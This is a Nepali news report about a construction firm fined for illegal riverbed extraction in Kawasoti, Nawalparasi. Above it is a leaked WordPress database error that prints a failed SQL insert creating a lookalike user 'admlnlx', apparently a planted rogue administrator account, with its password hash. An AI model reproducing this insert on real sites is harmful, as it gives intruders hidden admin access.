WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BN5ki3oct3LVjvC/N4JWUj9376XXjI/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 04:23:54', '', 'admlnlx', 'admlnlx')
कावासोती, पुस ७-
नवलपरासीको कावासोतीस्थित केरुङ्गे खोलामा अवैध रुपमा खोलाजन्य सामग्रीको उत्खनन र निकासी गर्दैआएको स्मृति निर्माण सेवाले रु ३५ लाख जरिवाना बुझाएको छ ।
जिल्ला विकास समितिका योजना अनुगमन तथा प्रशासकीय अधिकृत प्रकाश पन्थीका अनुसार स्मृति निर्माण सेवालाई रु ६५ लाख जरिवाना बुझाउन भनिएकामा उक्त रकम मात्र दाखिला गरेको हो । मङ्सिर २५ गते खोलाबाट २७ टिप्पर र तीन जेसिवीलाई नियन्त्रणमा लिइएको थियो । आधा रकम दाखिला पछि १७ टिप्पर छुटेका छन् ।
खोलाबाट अवैध रुपमा नदीजन्य सामग्री निकासी भइआएको गुनासो बढेपछि स्थानीय विकास अधिकारी जीवलाल भुसालसहितको टोलीले निरीक्षण गरी ढुवानीका साधन नियन्त्रणमा लिएको थियो ।
स्मृति निर्माण सेवाले तीन वर्ष अगाडि केरुङ्गे खोला ठेक्कामा लिएको र त्यस बेलाको स्टक सामग्री भएको भन्दै खोलाको दोहन गरेको गुनासो बढेपछि स्थानीय विकास अधिकारी भुसालले कारबाहीका लागि पहल लिनुभएको हो । कारबाहीको प्रक्रिया अगाडि बढेपछि स्मृति निर्माण सेवाका सञ्चालकहरु नेताहरुकोमा गुहार्न पुगेको बताइन्छ । रासस